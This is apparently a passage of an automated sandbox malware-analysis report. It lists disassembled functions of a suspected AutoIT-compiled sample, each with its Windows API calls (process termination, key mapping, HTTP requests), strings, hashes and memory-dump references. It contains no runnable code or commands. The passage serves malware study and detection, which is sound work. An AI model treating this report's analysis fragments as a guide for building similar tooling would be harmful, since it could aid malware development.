                          • Opcode Fuzzy Hash: 8e28487eddcf73962e1cbb6c85bb9a1898bb1cee5b5b01bb59448f209d42c7c7
                          • Instruction Fuzzy Hash: 1C014475A00219BFEB10ABA59C49B5EBFB8EF48751F104066FE04EB2D0DA709D01CF61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B287D7 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON
                          Download Yara Rule
                          APIs
                          • __init_pointers.LIBCMT ref: 00B287D7
                            • Part of subcall function 00B21E5A: __initp_misc_winsig.LIBCMT ref: 00B21E7E
                            • Part of subcall function 00B21E5A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00B28BE1
                            • Part of subcall function 00B21E5A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00B28BF5
                            • Part of subcall function 00B21E5A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00B28C08
                            • Part of subcall function 00B21E5A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00B28C1B
                            • Part of subcall function 00B21E5A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00B28C2E
                            • Part of subcall function 00B21E5A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00B28C41
                            • Part of subcall function 00B21E5A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00B28C54
                            • Part of subcall function 00B21E5A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00B28C67
                            • Part of subcall function 00B21E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00B28C7A
                            • Part of subcall function 00B21E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00B28C8D
                            • Part of subcall function 00B21E5A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00B28CA0
                            • Part of subcall function 00B21E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00B28CB3
                            • Part of subcall function 00B21E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00B28CC6
                            • Part of subcall function 00B21E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00B28CD9
                            • Part of subcall function 00B21E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00B28CEC
                            • Part of subcall function 00B21E5A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00B28CFF
                          • __mtinitlocks.LIBCMT ref: 00B287DC
                            • Part of subcall function 00B28AB3: InitializeCriticalSectionAndSpinCount.KERNEL32(00BBAC68,00000FA0,?,?,00B287E1,00B26AFA,00BB67D8,00000014), ref: 00B28AD1
                          • __mtterm.LIBCMT ref: 00B287E5
                            • Part of subcall function 00B2884D: RtlDeleteCriticalSection.NTDLL(00000000), ref: 00B289CF
                            • Part of subcall function 00B2884D: _free.LIBCMT ref: 00B289D6
                            • Part of subcall function 00B2884D: RtlDeleteCriticalSection.NTDLL(00BBAC68), ref: 00B289F8
                          • __calloc_crt.LIBCMT ref: 00B2880A
                          • GetCurrentThreadId.KERNEL32 ref: 00B28833
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                          • String ID:
                          • API String ID: 2942034483-0
                          • Opcode ID: ca5002824a6122793caeaf6960d0cc2c03c2afed60e1ee7c323a7d5bfe3e28f8
                          • Instruction ID: 1db6d5866002e2f47cda52a790f7b77bac58981eb075417be47625585cb81fde
                          • Opcode Fuzzy Hash: ca5002824a6122793caeaf6960d0cc2c03c2afed60e1ee7c323a7d5bfe3e28f8
                          • Instruction Fuzzy Hash: F5F0E93351B7316AE2347B387C0764A26C0CF11730B604AEAF46CDA0F6FF5198414155
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B4A3D2 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                          • String ID:
                          • API String ID: 1423608774-0
                          • Opcode ID: dfcf26c27bb32be8403a949aef2e26c0acbde321031631c7d8755394341cc71f
                          • Instruction ID: 279c85e96787a914a4fa9058cec8ec5b0085d2d138983963921c264bbc6b0b1c
                          • Opcode Fuzzy Hash: dfcf26c27bb32be8403a949aef2e26c0acbde321031631c7d8755394341cc71f
                          • Instruction Fuzzy Hash: FF018136141211ABD7152F54ED88DEB7BBAFF89712B00056AF503930B1DF60A900DB55
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B01867 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                          Download Yara Rule
                          APIs
                          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00B01898
                          • MapVirtualKeyW.USER32(00000010,00000000), ref: 00B018A0
                          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00B018AB
                          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00B018B6
                          • MapVirtualKeyW.USER32(00000011,00000000), ref: 00B018BE
                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B018C6
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Virtual
                          • String ID:
                          • API String ID: 4278518827-0
                          • Opcode ID: a02224c36c50389e849f9904413f4577e4b9cba6ba2839c159f07bc142b6759a
                          • Instruction ID: 1a4f2edc41a23d72609bcbfce8c0e86a46541946d44248f7a0e493f2f7db03b2
                          • Opcode Fuzzy Hash: a02224c36c50389e849f9904413f4577e4b9cba6ba2839c159f07bc142b6759a
                          • Instruction Fuzzy Hash: F60144B0902B5ABDE3008F6A8C85A52FFA8FF19354F04411BA15C47A82C7B5A864CBE5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B484F4 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                          Download Yara Rule
                          APIs
                          • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00B48504
                          • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00B4851A
                          • GetWindowThreadProcessId.USER32(?,?), ref: 00B48529
                          • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B48538
                          • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B48542
                          • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B48549
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                          • String ID:
                          • API String ID: 839392675-0
                          • Opcode ID: 8a7c53159aad0ab1703a42276e99b14c9c8d7681f0619bf40789765c47be7b7e
                          • Instruction ID: 4ca1038d403b3b9f09f9eb9313d7489cee919a41dcf599eb4da2507335710d9c
                          • Opcode Fuzzy Hash: 8a7c53159aad0ab1703a42276e99b14c9c8d7681f0619bf40789765c47be7b7e
                          • Instruction Fuzzy Hash: 6CF03072240158BBE7216B529D0EEEF7B7CDFC6B15F00015AFA05E20A0EBA06A01D7B5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B4A31D Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • InterlockedExchange.KERNEL32(?,?), ref: 00B4A330
                          • RtlEnterCriticalSection.NTDLL(?), ref: 00B4A341
                          • TerminateThread.KERNEL32(?,000001F6,?,?,?,00B766D3,?,?,?,?,?,00B0E681), ref: 00B4A34E
                          • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00B766D3,?,?,?,?,?,00B0E681), ref: 00B4A35B
                            • Part of subcall function 00B49CCE: CloseHandle.KERNEL32(?,?,00B4A368,?,?,?,00B766D3,?,?,?,?,?,00B0E681), ref: 00B49CD8
                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 00B4A36E
                          • RtlLeaveCriticalSection.NTDLL(?), ref: 00B4A375
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                          • String ID:
                          • API String ID: 3495660284-0
                          • Opcode ID: 12ae6ed59ebe1cc9ab9944049afff9eb1e704b54c9b8a30c71568f096e0235b5
                          • Instruction ID: edd33b676cbdc55855f59f7528ab1f141edd432b382fe463b41ad1d4f301edb9
                          • Opcode Fuzzy Hash: 12ae6ed59ebe1cc9ab9944049afff9eb1e704b54c9b8a30c71568f096e0235b5
                          • Instruction Fuzzy Hash: 1EF05836181211ABD3512F64ED8CEDB7BBAEF89712B000562F202A20F1DFB5A901DB61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B1D7C7 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B2010A: std::exception::exception.LIBCMT ref: 00B2013E
                            • Part of subcall function 00B2010A: __CxxThrowException@8.LIBCMT ref: 00B20153
                            • Part of subcall function 00B0CAEE: _memmove.LIBCMT ref: 00B0CB2F
                            • Part of subcall function 00B0BBD9: _memmove.LIBCMT ref: 00B0BC33
                          • __swprintf.LIBCMT ref: 00B1D98F
                          Strings
                          • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00B1D832
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                          • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                          • API String ID: 1943609520-557222456
                          • Opcode ID: ae51b920cfe1ed96c42174cbe885ee84237fc60f5bbfe108e2945403828b7fac
                          • Instruction ID: 9d0e1e5db961ea5a19f77c0eb51dfbcc870b4e2074b4213ebecf7a0819a497fa
                          • Opcode Fuzzy Hash: ae51b920cfe1ed96c42174cbe885ee84237fc60f5bbfe108e2945403828b7fac
                          • Instruction Fuzzy Hash: 3D916971118301AFC714EF24C885DAEBBF5EF85740F40499DF59A972A2EB20EE45CB52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B5B482 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON
                          Download Yara Rule
                          APIs
                          • VariantInit.OLEAUT32(?), ref: 00B5B4A8
                          • CharUpperBuffW.USER32(?,?), ref: 00B5B5B7
                          • VariantClear.OLEAUT32(?), ref: 00B5B73A
                            • Part of subcall function 00B4A6F6: VariantInit.OLEAUT32(00000000), ref: 00B4A736
                            • Part of subcall function 00B4A6F6: VariantCopy.OLEAUT32(?,?), ref: 00B4A73F
                            • Part of subcall function 00B4A6F6: VariantClear.OLEAUT32(?), ref: 00B4A74B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Variant$ClearInit$BuffCharCopyUpper
                          • String ID: AUTOIT.ERROR$Incorrect Parameter format
                          • API String ID: 4237274167-1221869570
                          • Opcode ID: 33a1e2070932f5af9dfe3f0db7f2bea7797853a7b761ad113f1b570704bf68de
                          • Instruction ID: 991f15efa5ebb859cf31c200f63b6571b407196ef32bc267c92f25bd33e287e1
                          • Opcode Fuzzy Hash: 33a1e2070932f5af9dfe3f0db7f2bea7797853a7b761ad113f1b570704bf68de
                          • Instruction Fuzzy Hash: AB916C746043019FCB10DF24D495E6ABBE4EF88711F1448EDF88A9B3A1DB31E949CB52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B45D65 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 180windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B03BCF: _wcscpy.LIBCMT ref: 00B03BF2
                          • _memset.LIBCMT ref: 00B45E56
                          • GetMenuItemInfoW.USER32(?), ref: 00B45E85
                          • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00B45F31
                          • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00B45F5B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: ItemMenu$Info$Default_memset_wcscpy
                          • String ID: 0
                          • API String ID: 4152858687-4108050209
                          • Opcode ID: 64fa2d88f9be3cb7b6e108e03c3586282f11a4a218d0938164d39cd7f925579b
                          • Instruction ID: e1baa5dcfaf5d055d1c85bfbc8bc5e318318c72e2bd81d20e0cb0fa1412693c6
                          • Opcode Fuzzy Hash: 64fa2d88f9be3cb7b6e108e03c3586282f11a4a218d0938164d39cd7f925579b
                          • Instruction Fuzzy Hash: 8A51F271514F01ABD7349B28C884A6BB7E8EF45350F080AADF895D31E2DB70CF49A792
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B45A25 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 00B45A93
                          • GetMenuItemInfoW.USER32 ref: 00B45AAF
                          • DeleteMenu.USER32(00000004,00000007,00000000), ref: 00B45AF5
                          • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00BC18F0,00000000), ref: 00B45B3E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Menu$Delete$InfoItem_memset
                          • String ID: 0
                          • API String ID: 1173514356-4108050209
                          • Opcode ID: d2dfc50bfac4d15565a0f93da0a93fbc93fc2c2d2f1714e320ba00d683d6b1de
                          • Instruction ID: f419c378a1589f6efe80cb2ecff0bab3f3a043792c67e9f824d5980c677f5bec
                          • Opcode Fuzzy Hash: d2dfc50bfac4d15565a0f93da0a93fbc93fc2c2d2f1714e320ba00d683d6b1de
                          • Instruction Fuzzy Hash: CA41B671204B019FDB20DF28C884F5AB7E4EF84314F04469EF955972D2D770DA01DB62
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B60458 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                          Download Yara Rule
                          APIs
                          • CharLowerBuffW.USER32(?,?,?,?), ref: 00B60478
                            • Part of subcall function 00B07F40: _memmove.LIBCMT ref: 00B07F8F
                            • Part of subcall function 00B0A2FB: _memmove.LIBCMT ref: 00B0A33D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: _memmove$BuffCharLower
                          • String ID: cdecl$none$stdcall$winapi
                          • API String ID: 2411302734-567219261
                          • Opcode ID: 4680e669d8668bac0f037de5f25642f873a68c723256bbfc396ecdb9df1fe413
                          • Instruction ID: 23386b73e51ba7f24f022ab32aa313570c4a5ccf06612b9d31a2b649741b2070
                          • Opcode Fuzzy Hash: 4680e669d8668bac0f037de5f25642f873a68c723256bbfc396ecdb9df1fe413
                          • Instruction Fuzzy Hash: 5B31AB7551061AABCF10EF58C881AFEB7F4FF25310B108AA9A822A72D5CB71E905CF50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B3C600 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B0CAEE: _memmove.LIBCMT ref: 00B0CB2F
                          • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00B3C684
                          • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00B3C697
                          • SendMessageW.USER32(?,00000189,?,00000000), ref: 00B3C6C7
                            • Part of subcall function 00B07E53: _memmove.LIBCMT ref: 00B07EB9
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: MessageSend$_memmove
                          • String ID: ComboBox$ListBox
                          • API String ID: 458670788-1403004172
                          • Opcode ID: db89e514b5bb44e8fb3734c33299f0d16a00f6ff8de427e8ba1ebf6304a77ec5
                          • Instruction ID: 6457e0a7cb69be892ef6a55d145b66f57f867ed25932fbf9f1b6c042738e6310
                          • Opcode Fuzzy Hash: db89e514b5bb44e8fb3734c33299f0d16a00f6ff8de427e8ba1ebf6304a77ec5
                          • Instruction Fuzzy Hash: 9621DD71A00108AFDB14ABA4DC86DFFBBE8DF46350F20469AF426E71E1DB74590A9760
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B54A41 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON
                          Download Yara Rule
                          APIs
                          • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00B54A60
                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B54A86
                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00B54AB6
                          • InternetCloseHandle.WININET(00000000), ref: 00B54AFD
                            • Part of subcall function 00B556A9: GetLastError.KERNEL32(?,?,00B54A2B,00000000,00000000,00000001), ref: 00B556BE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                          • String ID:
                          • API String ID: 1951874230-3916222277
                          • Opcode ID: 0be605ee01e50f94735972a52b3724f7e946ff941a9b198f749ec34640190cbc
                          • Instruction ID: 130c5192db5dac01ae32e621b58b5f7d2d030beebaa3c49c80114d71428c9db8
                          • Opcode Fuzzy Hash: 0be605ee01e50f94735972a52b3724f7e946ff941a9b198f749ec34640190cbc
                          • Instruction Fuzzy Hash: C021CCB9540608BEEB12DB649CC4FBBB7ECEB8874AF00009AF90593150EB608D499B70
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B038E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 84windowCOMMON
                          Download Yara Rule
                          APIs
                          • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00B7454E
